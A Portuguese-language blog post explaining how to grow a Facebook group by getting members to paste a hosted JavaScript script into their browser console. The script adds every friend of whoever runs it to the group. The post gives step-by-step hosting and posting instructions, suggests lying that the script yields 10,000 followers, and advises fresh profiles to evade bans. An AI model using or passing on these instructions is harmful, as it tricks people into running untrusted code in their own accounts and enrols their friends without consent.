Como fazer o seu grupo crescer com script

Você que é divulgador, produtor de eventos ou um simples mortal que gostaria de ver o seu grupo crescer da noite para o dia, hoje vamos divulgar para você como fazer o seu grupo crescer com script. E tudo o que você precisa é de contatos ou alguns perfis com muitos amigos para acender o fogo e deixar queimando. Para ter sucesso no uso do script, é preciso de que pessoas o utilizem para crescer os seus grupos também, assim não só os delas, mas os seus também aumentarão o número à medida que o script for utilizado em cada perfil.
É um tanto curioso como o antigo grupo CHAT – Unidos contra o tédio cresceu, chegando a 2,8 milhões de membros em apenas alguns meses. E poderia ser hoje,um dos maiores grupos do Facebook, se ele não tivesse sido roubado e nem excluído, pouco tempo após ter sido recuperado. Mas então, a questão é: Você sabia que um dos grupos mais queridos do Facebook pelos seus membros cresceu via script e que a maioria dos membros não queriam estar nele? Essa é a triste realidade.  Infelizmente, fazer este tipo de coisa é antiética, mas qual e o problema, se o Facebook permite que façamos isto?  Aliás, permite até um limite, que quando exercido os criadores de administradores do grupo poderão ser perseguido em toda a rede social.

O que você vai precisar para utilizar o script

- Uma hospedagem, mesmo que seja grátis.
- Perfis com muitos amigos para divulgar o script
- Conhecimento para hospedar o script
- Um bom papo para fazer os membros do grupo utilizar o script
Tendo a hospedagem, você pode copiar o código do script que está hospedado no seguinte link:http://brucex10.tk/NewJSGroup.txt e depois de copiar, colar no bloco de notas do Windows. No bloco de notas, você dá CTRL + F e procura por gid, ao encontrar, você vai na frente, o seguinte número “469620816444664″, este é o ID do grupo. Você vai trocar pelo ID do seu grupo. Salvar o script com qualquer nome.txt e subir ele na sua hospedagem de preferência.

Com o script hospedado, você vai precisar de um bom papo para fazer os membros do grupo executá-lo. Por exemplo, você pode fazer como outros faziam tempos atrás, afirmando aos membros que o script vai gerar 10 mil seguidores para quem executá-lo via console.

Aprenda a utilizar o script para fazer o seu grupo crescer

Com o script hospedado, você vai até o seu grupo e digita uma descrição como por exemplo:
Saiba como adicionar todos os seus amigos ao seu grupo
1 – Acesse http://[link do seu script]
2 – Copie o código e vá até o seu grupo
3 – No seu grupo pressione CTRL + Shift + K  no Mozilla Firefox ou CTRL + Shift + J no Google Chrome
4 – Cole o código copiado no console. Espere adicionar todos os seus amigos ao seu grupo e pronto.
Em seguida, execute o código para adicionar os seus amigos no grupo, assim eles poderão ver a descrição do seu grupo ou publicação fixa. Caso você tenha um site, poderá utilizá-lo também para divulgar o seu código.

O que você precisa saber antes de qualquer coisa

O script vai adicionar os membros ao seu grupo e ao grupo de quem utilizá-lo. Porém, os membros só vão para o seu grupo se você aceitar no seu grupo, quem executou o script nos próximos 2 minutos. Caso você aceite depois, os amigos de quem executou não serão adicionados ao grupo. O tempo estimado de 2 minutos, trata-se do tempo médio de execução do script. A quantidade de amigos poderá diminuir o tempo ou aumentá-lo.
O script só adicionará amigos de quem já está no grupo. Por isso, se você tiver outros perfis e quiser usar os amigos dele para adicionar ao seu grupo, será necessário adicioná-los ao grupo antes.
É recomendável utilizar o script com grupos novos, pois cedo ou tarde o Facebook vai acabar excluindo o grupo e até mesmo o perfil de administradores do grupo. Por tanto, recomenda-se também a criação de um perfil novo.
Membros de um grupo

Um comentário: